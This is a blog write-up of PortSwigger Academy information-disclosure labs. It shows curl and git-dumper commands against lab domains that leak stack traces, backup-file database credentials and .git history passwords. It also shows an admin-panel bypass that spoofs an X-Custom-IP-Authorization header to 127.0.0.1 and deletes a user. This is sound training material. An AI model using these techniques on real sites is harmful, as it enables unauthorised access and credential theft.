Information Disclosure - [PortSwigger]

Cover Image for Information Disclosure - [PortSwigger]
Marmeus
Marmeus

Table of Contents

    Introduction

    In this post there is a compilation of every apprentice and practitioner lab related to the *Information Disclosure topic from PortSwigger Academy.

    Information disclosure in error messages [Apprentice]

    Checking a product appears the parameter productId which contains a number as a value. So, by changing the number to letters, we obtain an error that contains the framework's version.

    kali@kali:~$ curl -skq https://<LAB_DOMAIN>.web-security-academy.net/product?productId=sdadfads
Internal Server Error: java.lang.NumberFormatException: For input string: "sdadfads"
        at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)
        at java.base/java.lang.Integer.parseInt(Integer.java:668)
        at java.base/java.lang.Integer.parseInt(Integer.java:786)
        at lab.l.e.e.w.E(Unknown Source)
        at lab.p.v.p.p.L(Unknown Source)
        at lab.p.v.z.a.q.a(Unknown Source)
        at lab.p.v.z.u.lambda$handleSubRequest$0(Unknown Source)
        at h.v.b.n.lambda$null$3(Unknown Source)
        at h.v.b.n.G(Unknown Source)
        at h.v.b.n.lambda$uncheckedFunction$4(Unknown Source)
        at java.base/java.util.Optional.map(Optional.java:260)
        at lab.p.v.z.u.c(Unknown Source)
        at lab.a.p.e.o.z(Unknown Source)
        at lab.p.v.l.z(Unknown Source)
        at lab.a.p.e.h.s(Unknown Source)
        at lab.a.p.e.h.C(Unknown Source)
        at h.v.b.n.lambda$null$3(Unknown Source)
        at h.v.b.n.G(Unknown Source)
        at h.v.b.n.lambda$uncheckedFunction$4(Unknown Source)
        at lab.a.g1.C(Unknown Source)
        at lab.a.p.e.h.x(Unknown Source)
        at lab.a.p.l.n.q(Unknown Source)
        at lab.a.p.o.M(Unknown Source)
        at lab.a.y.o(Unknown Source)
        at lab.a.y.J(Unknown Source)
        at lab.a.y.V(Unknown Source)
        at h.v.x.e.i.C(Unknown Source)
        at h.v.x.e.i.r(Unknown Source)
        at h.v.x.e.i.run(Unknown Source)
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        at java.base/java.lang.Thread.run(Thread.java:833)

Apache Struts 2 2.3.31

    Information disclosure on debug page [Apprentice]

    To pass this lab we need to find a specific comment. This can be found by reviewing the HTML on any site page or using the engagement tools Discover content or Find comments. The path you are looking for is /cgi-bin/phpinfo.php.

    Finally, you only have to access that path and look for the "SECRET_KEY" value.

    Source code disclosure via backup files [Apprentice]

    Looking at /robots.txt there is a path named /backup.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/robots.txt
User-agent: *
Disallow: /backup

    Looking inside the file, the password can be obtained.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/backup/ProductTemplate.java.bak
[...]

        ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
                "org.postgresql.Driver",
                "postgresql",
                "localhost",
                5432,
                "postgres",
                "postgres",
                "xfpffqvyibw9z80y992e4vhiolckrdoc"
[...]

    Authentication bypass via information disclosure [Apprentice]

    Using the TRACE method for any request on the web site, a custom header appears X-Custom-IP-Authorization.

    kali@kali:~$ curl -b "session=<WIENER_COOKIE>" -X TRACE https://<LAB_DOMAIN>.web-security-academy.net/admin
TRACE /admin HTTP/1.1
Host: <LAB_DOMAIN>.web-security-academy.net
User-Agent: curl/7.81.0
Accept: */*
Cookie: session=AkRcO4SkiO40hpgg27zfvgZxXeJT2FBJ
X-Custom-IP-Authorization: [REDACTED]

    The value corresponds to our public IP.

    kali@kali:~$ curl https://ifconfig.me
[REDACTED]

    Trying to access the /admin panel, appears the message " Admin interface only available to local users ".

    So, by intercepting the request and adding the X-Custom-IP-Authorization header with the localhost IP, it is possible to bypass the IP filter and delete the user Carlos.

    kali@kali:~$ curl -sqD - -b "session=<WIENER_COOKIE>" -H "X-Custom-IP-Authorization: 127.0.0.1" https://<LAB_DOMAIN>.web-security-academy.net/admin/delete?username=carlos  | head
HTTP/1.1 302 Found
Location: /admin
Connection: close
Content-Length: 0

    Information disclosure in version control history [Practitioner]

    There is a .git repository.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/.git
<html>
    <head>
        <title>Index of /.git</title>
        <style>
            table { margin: 1em; }
            td { padding: 0.2em; }
        </style>
    </head>
    <body>
        <h1>Index of /.git</h1>
        <table>
            <tr><th>Name</th><th>Size</th></tr>
            <tr><td><a href='/.git/branches/'>&lt;branches&gt;</a></td><td></td></tr>
            <tr><td><a href='/.git/description'>description</a></td><td>73B</td></tr>
            <tr><td><a href='/.git/hooks/'>&lt;hooks&gt;</a></td><td></td></tr>
            <tr><td><a href='/.git/info/'>&lt;info&gt;</a></td><td></td></tr>
            <tr><td><a href='/.git/refs/'>&lt;refs&gt;</a></td><td></td></tr>
            <tr><td><a href='/.git/HEAD'>HEAD</a></td><td>23B</td></tr>
            <tr><td><a href='/.git/config'>config</a></td><td>152B</td></tr>
            <tr><td><a href='/.git/objects/'>&lt;objects&gt;</a></td><td></td></tr>
            <tr><td><a href='/.git/index'>index</a></td><td>225B</td></tr>
            <tr><td><a href='/.git/COMMIT_EDITMSG'>COMMIT_EDITMSG</a></td><td>34B</td></tr>
            <tr><td><a href='/.git/logs/'>&lt;logs&gt;</a></td><td></td></tr>
        </table>
    </body>
</html>

    You can use git-dumper to download the git repository.

    kali@kali:~$ mkcd /tmp/Repo
kali@kali:/tmp/Repo$ git-dumper https://<LAB_DOMAIN>.web-security-academy.net/.git

    Then, look at the commits.

    kali@kali:/tmp/Repo$ cat admin.conf 
ADMIN_PASSWORD=env('ADMIN_PASSWORD')
kali@kali:/tmp/Repo$ git log --oneline
b3415ee (HEAD -> master) Remove admin password from config
6431464 Add skeleton admin panel

    Because there is nothing on the current version, let's change to the first commit.

    kali@kali:/tmp/Repo$ git checkout 6431464
Note: switching to '6431464'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 6431464 Add skeleton admin panel

    After that, you can retrieve the Administrator's password to access the admin panel.

    kali@kali:/tmp/Repo$ cat admin.conf 
ADMIN_PASSWORD=mskn9e2mjzjgjd1e8kz9